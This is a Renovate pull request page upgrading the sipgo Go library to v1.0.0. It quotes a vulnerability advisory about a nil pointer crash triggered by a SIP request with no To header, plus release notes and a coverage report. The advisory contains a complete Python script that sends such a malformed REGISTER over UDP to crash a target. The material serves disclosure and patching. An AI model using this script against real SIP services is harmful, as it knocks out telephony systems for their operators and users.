@renovate renovate bot commented Dec 21, 2025

This PR contains the following updates:

| Package | Change |
|---|---|
| github.com/emiago/sipgo | v0.33.0 -> v1.0.0 |

GitHub Vulnerability Alerts

CVE-2025-68274

Description

A nil pointer dereference vulnerability was discovered in the SIPGO library's NewResponseFromRequest function that affects all normal SIP operations. The vulnerability allows remote attackers to crash any SIP application by sending a single malformed SIP request without a To header.

The vulnerability occurs when SIP message parsing succeeds for a request missing the To header, but the response creation code assumes the To header exists without proper nil checks. This affects routine operations like call setup, authentication, and message handling - not just error cases.

Note: This vulnerability affects all SIP applications using the sipgo library, not just specific configurations or edge cases, as long as they make use of the NewResponseFromRequest function.

Technical details

The vulnerability is located in /sip/response.go at line 242 in the NewResponseFromRequest function:

    if _, ok := res.To().Params["tag"]; !ok {
        uuid, _ := uuid.NewRandom()
        res.to.Params["tag"] = uuid.String()
    }

Root Cause:

  1. Missing To Header: When any SIP request is sent without a To header, the SIP message parsing succeeds but the To header is never set in the request object.

  2. Header Copying Logic: During response creation in NewResponseFromRequest, the code attempts to copy headers from the request to the response. Since there's no To header in the request, no To header is copied to the response.

  3. Unsafe Assumption: The response creation code assumes the To header exists and calls res.To().Params["tag"] without checking if res.To() returns nil, causing a nil pointer dereference.

Stack Trace:

    panic: runtime error: invalid memory address or nil pointer dereference
    [signal SIGSEGV: segmentation violation code=0x2 addr=0x70 pc=0x10261fcb4]

    goroutine 175 [running]:
    github.com/emiago/sipgo/sip.NewResponseFromRequest(0x14000433e00, 0x191, {0x1026b074b, 0xb}, {0x0, 0x0, 0x0})
        /Users/user/Documents/GitHub/sipgo/sip/response.go:242 +0x394

Impact

This vulnerability affects all SIP applications using the sipgo library when using NewResponseFromRequest to generate SIP responses.

Attack Impact:

  • Availability: Complete denial of service - application crashes immediately
  • Remote Exploitation: Yes
  • Authentication Required: No - vulnerability triggers during initial response generation which does not require authentication

How to reproduce the issue

To reproduce this issue, you need:

  1. A SIP application using the vulnerable sipgo library
  2. Network access to send SIP messages to the target

Steps:

  1. Save the following Python script as sipgo-response-dos.py:

    #!/usr/bin/env python3
    import socket
    import sys
    import time
    import random
    
    def create_malformed_register(target_ip, target_port):
        call_id = f"sipgo-dos-{int(time.time())}"
        tag = f"sipgo-dos-{random.randint(1000, 9999)}"
        branch = f"z9hG4bK-sipgo-dos-{random.randint(10000, 99999)}"
        
        # Craft malformed SIP request without To header
        sip_message = (
            f"REGISTER sip:{target_ip}:{target_port} SIP/2.0\r\n"
            f"Via: SIP/2.0/UDP 192.168.1.100:5060;rport;branch={branch}\r\n"
            f"From: <sip:attacker@192.168.1.100>;tag={tag}\r\n"
            f"Call-ID: {call_id}\r\n"
            f"CSeq: 1 REGISTER\r\n"
            f"Contact: <sip:attacker@192.168.1.100:5060>\r\n"
            f"Content-Length: 0\r\n"
            f"\r\n"
        )
        return sip_message
    
    if __name__ == "__main__":
        if len(sys.argv) != 3:
            print("Usage: python3 sipgo-response-dos.py <target_ip> <target_port>")
            sys.exit(1)
        
        target_ip = sys.argv[1]
        target_port = int(sys.argv[2])
        
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        payload = create_malformed_register(target_ip, target_port)
        
        print(f"Sending malformed REGISTER to {target_ip}:{target_port}")
        sock.sendto(payload.encode('utf-8'), (target_ip, target_port))
        print("Exploit sent - target should crash immediately")

  2. Run the script against a vulnerable sipgo application:

    python3 sipgo-response-dos.py <target_ip> <target_port>

  3. Observe that the target application crashes with a SIGSEGV panic.

Note: The key element is the missing To header in any SIP request, which triggers the nil pointer dereference.


Release Notes

emiago/sipgo (github.com/emiago/sipgo)

v1.0.0


🚀 SIPgo v1.0.0 is here 🚀

SIPgo has had a long journey, and the API was challenged by many different projects and used by big names out there. There hasn’t been any significant need for breaking changes lately, so there is pretty high confidence this API will remain stable going forward.

What does 1.0.0 mean?

  • A stable and predictable API
  • No breaking changes planned in the near future
  • It will make a more stable API for the Diago lib
  • More confidence for production deployments

Future ✈️

There are open things regarding performance and small features that will probably land in the 1.0.0 API. To mention a few:

  • PR for Parser improvements
  • Graceful shutdown
  • More transport control, like deadlines

The lib has the opportunity to be improved further, but even in its current state it excels in performance when handling high loads of traffic.
You can always check the proxysip example and run it locally with docker-compose sipp stress, where on this limited container (4 cores) we can achieve high throughput on a modern CPU, ~2000rps with no latency impact.

✋ v2

Many big things or issues that may not be a good fit for the current API are moved to the v2 Milestone, and I would like to see this happening as well.

🙌 Thank You

Huge thanks to everyone who contributed, submitted issues, provided feedback, or used SIPgo as a building block in their own systems.
Your input has shaped the API and helped bring SIPgo to this milestone.

Thank you all for your contributions and for keeping this project alive!

Full Changelog: emiago/sipgo@v0.33.0...v1.0.0


Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


This PR was generated by Mend Renovate. View the repository job log.
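
For services that cannot take the upgrade immediately, a pre-check on the raw datagram can reject requests that lack the headers a response is built from. The following Go sketch is an added example, not code from sipgo or from this PR; `MissingHeaders`, the header list and the sample messages are assumptions made for illustration, and it goes beyond the `To` case on the page to cover Via, From, Call-ID and CSeq as well as RFC 3261 compact header names.

```go
package main

import (
	"fmt"
	"strings"
)

// Compact header names from RFC 3261 mapped to their long forms.
var compact = map[string]string{"t": "to", "f": "from", "i": "call-id", "v": "via"}

// Headers a response is built from; the crash on this page is a missing "to".
var required = []string{"via", "from", "to", "call-id", "cseq"}

// MissingHeaders returns the required headers absent from a raw SIP request.
func MissingHeaders(raw string) []string {
	head, _, _ := strings.Cut(raw, "\r\n\r\n")
	seen := map[string]bool{}
	for _, line := range strings.Split(head, "\r\n")[1:] { // skip request line
		name, _, ok := strings.Cut(line, ":")
		if !ok || line[0] == ' ' || line[0] == '\t' {
			continue // no colon, or a folded continuation line
		}
		name = strings.ToLower(strings.TrimSpace(name))
		if long, isCompact := compact[name]; isCompact {
			name = long
		}
		seen[name] = true
	}
	var missing []string
	for _, h := range required {
		if !seen[h] {
			missing = append(missing, h)
		}
	}
	return missing
}

// Constructed sample requests (not captured traffic).
const sampleNoTo = "REGISTER sip:example.com SIP/2.0\r\n" +
	"Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK-1\r\n" +
	"From: <sip:alice@example.com>;tag=1\r\n" +
	"Call-ID: c1\r\nCSeq: 1 REGISTER\r\nContent-Length: 0\r\n\r\n"

const sampleCompact = "OPTIONS sip:example.com SIP/2.0\r\n" +
	"v: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK-2\r\n" +
	"f: <sip:alice@example.com>;tag=2\r\nt: <sip:bob@example.com>\r\n" +
	"i: c2\r\nCSeq: 2 OPTIONS\r\nl: 0\r\n\r\n"

func main() {
	for _, raw := range []string{sampleNoTo, sampleCompact} {
		fmt.Println("missing headers:", MissingHeaders(raw)) // empty means safe to answer
	}
}
```

A request with a non-empty result should be dropped and logged before it reaches response creation.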

@pionbot pionbot force-pushed the renovate/go-github.com-emiago-sipgo-vulnerability branch from 6417cd0 to e2802dc Compare December 21, 2025 09:58

codecov bot commented Dec 21, 2025

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 0.00%. Comparing base (c924718) to head (e2802dc).
⚠️ Report is 1 commits behind head on master.

Additional details and impacted files
@@          Coverage Diff           @@
##           master    #414   +/-   ##
======================================
  Coverage    0.00%   0.00%           
======================================
  Files          28      28           
  Lines        2922    2922           
======================================
  Misses       2922    2922           
Flag Coverage Δ
go 0.00% <ø> (ø)

Flags with carried forward coverage won't be shown. Click here to find out more.

